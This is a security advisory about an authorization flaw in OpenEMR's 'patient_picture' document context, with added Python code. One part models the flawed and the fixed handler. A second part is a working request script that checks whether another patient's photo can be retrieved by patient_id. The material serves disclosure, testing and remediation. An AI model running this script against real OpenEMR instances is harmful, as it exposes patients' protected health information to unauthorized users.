OpenEMR Patient Picture Context Unauthorized Photo Retrieval Vulnerability

Vulnerability

A vulnerability exists in OpenEMR versions prior to 8.0.0 that allows any authenticated user with document access to retrieve any patient's photo from the document controller. The 'patient_picture' context serves the image for whatever patient ID the caller supplies and does not verify that the caller is authorized to access that patient's record; the only check applied is the section-level document permission. Patient photos are protected health information, so the flaw exposes PHI to users who hold document permissions but no entitlement to the particular patient.
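The following is an added illustration of the authorization gap described above, not code from OpenEMR or from this advisory. It models a picture handler in Python with two assumptions that are not taken from the page: a section-level ACL expressed as strings such as "documents:read", and a per-patient access rule in which patients belong to a facility and users are scoped to facilities. OpenEMR's real authorization model differs; only the shape of the flaw (section permission checked, patient entitlement not checked) and of the fix is shown.

```python
# Added example, not OpenEMR code. Models the 'patient_picture' IDOR:
# the pre-fix handler trusts the caller-supplied patient id after a
# section-level ACL check; the hardened handler also checks the caller's
# entitlement to that specific patient record.
# Assumed (not from the advisory): "documents:read" ACL strings and a
# facility-based per-patient access rule.
from dataclasses import dataclass


@dataclass
class User:
    name: str
    acl: set          # section-level permissions, e.g. {"documents:read"}
    facilities: set   # facilities whose patients this user may view


@dataclass
class Patient:
    pid: int
    facility: str
    picture: bytes


class AuthorizationError(Exception):
    pass


# Constructed sample records for the demonstration.
PATIENTS = {
    1: Patient(1, "north", b"PNG-bytes-patient-1"),
    2: Patient(2, "south", b"PNG-bytes-patient-2"),
}


def serve_picture_vulnerable(user, patient_id, patients=PATIENTS):
    """Pre-fix behaviour: only the section ACL is consulted, so any user
    with document read access can pull any patient's photo by id."""
    if "documents:read" not in user.acl:
        raise AuthorizationError("no document access")
    patient = patients.get(patient_id)
    if patient is None:
        return None
    return patient.picture


def may_access_patient(user, patient):
    """Assumed per-patient rule: the user is scoped to the patient's facility."""
    return patient.facility in user.facilities


def serve_picture_fixed(user, patient_id, patients=PATIENTS):
    """Hardened form: the section ACL is necessary but not sufficient; the
    request is also checked against the specific patient record. Unknown
    and unauthorized ids get the same error so ids cannot be enumerated
    through this endpoint."""
    if "documents:read" not in user.acl:
        raise AuthorizationError("no document access")
    patient = patients.get(patient_id)
    if patient is None or not may_access_patient(user, patient):
        raise AuthorizationError("not authorized for this patient")
    return patient.picture


def fixed_denies(user, patient_id):
    """True if the hardened handler refuses the request."""
    try:
        serve_picture_fixed(user, patient_id)
        return False
    except AuthorizationError:
        return True


if __name__ == "__main__":
    nurse_north = User("nurse", {"documents:read"}, {"north"})
    # Vulnerable handler hands over a patient from another facility.
    print(serve_picture_vulnerable(nurse_north, 2))
    # Hardened handler refuses the same request.
    print(fixed_denies(nurse_north, 2))
```

The important property is that the per-patient check runs on the object the caller named, not on the caller's role alone; a role check answers "may this user see documents at all", while the IDOR question is "may this user see this patient's document".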

Impact

This is an Insecure Direct Object Reference (IDOR): any user with document access can retrieve the photo of any patient by supplying that patient's ID, whether or not the user has any entitlement to that patient's record.

Reproduction

To reproduce this vulnerability, log in as a user with document read permission who would not otherwise be entitled to view the target patient's record; a successful request from a user who is already permitted to see that patient proves nothing. Identify another patient's ID, which can be found through reports, URL enumeration, or similar means. Send a GET request to the document controller for the patient picture with the 'patient_id' parameter set to that patient's ID. If the response is the patient's photo (an image, rather than an error or a redirect to the login page), the vulnerability is confirmed.
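The following is an added script that automates the check above against an instance you are authorized to assess; it is not part of the advisory and not OpenEMR code. Assumptions not taken from the page: the document controller URL for the picture context is passed in as `controller_url` (the advisory names only the 'patient_id' parameter), the session is carried in a cookie header, and the photo counts as served when the server answers 200 with an image content type. Only the Python standard library is used.

```python
# Added example, not from the advisory. Sends the patient picture request
# described in the Reproduction section and decides whether a photo came
# back. Assumed: controller_url and session_cookie are supplied by the
# tester; the only documented parameter, patient_id, is appended.
import urllib.error
import urllib.parse
import urllib.request


def build_picture_request(controller_url, session_cookie, patient_id):
    """Append patient_id to the controller URL and attach the session cookie."""
    sep = "&" if "?" in controller_url else "?"
    url = f"{controller_url}{sep}{urllib.parse.urlencode({'patient_id': patient_id})}"
    return urllib.request.Request(url, headers={"Cookie": session_cookie})


def photo_was_served(status, content_type, body):
    """Decision rule: confirmed only if another patient's id came back as an
    actual image, not an HTML error page, a login redirect or an empty body."""
    return (
        status == 200
        and content_type.lower().startswith("image/")
        and len(body) > 0
    )


def check_patient_picture(controller_url, session_cookie, patient_id, timeout=10):
    """Return True if the server served a photo for patient_id to this session.
    Run once with an id the user is entitled to (baseline) and once with an
    id the user should not see; the IDOR holds only if both return True."""
    req = build_picture_request(controller_url, session_cookie, patient_id)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return photo_was_served(
                resp.status, resp.headers.get("Content-Type", ""), resp.read()
            )
    except urllib.error.HTTPError:
        # 401/403/404 all mean no photo was served for this id.
        return False


if __name__ == "__main__":
    import sys
    # usage: script.py <controller_url> <session_cookie> <patient_id>
    url, cookie, pid = sys.argv[1], sys.argv[2], int(sys.argv[3])
    print("photo served:", check_patient_picture(url, cookie, pid))
```

Run it twice with the same low-privilege session: first against a patient ID that user is permitted to view, to confirm the session and endpoint are right, then against a patient ID the user should not be able to see. A patched instance should answer the second request with an error rather than the image.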

Remediation

Update to OpenEMR version 8.0.0 or later, where this vulnerability has been fixed. After upgrading, repeat the reproduction step with a low-privilege document user against a patient that user is not entitled to view to confirm the request is now refused.

Added: Feb 25, 2026, 10:44 PM
Updated: Feb 25, 2026, 10:44 PM

Vulnerability Rating

Custom Algorithm

spread: 4.5
impact: 0.6
exploitability: 6.2
remediation: 7.7
relevance: 3.2
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.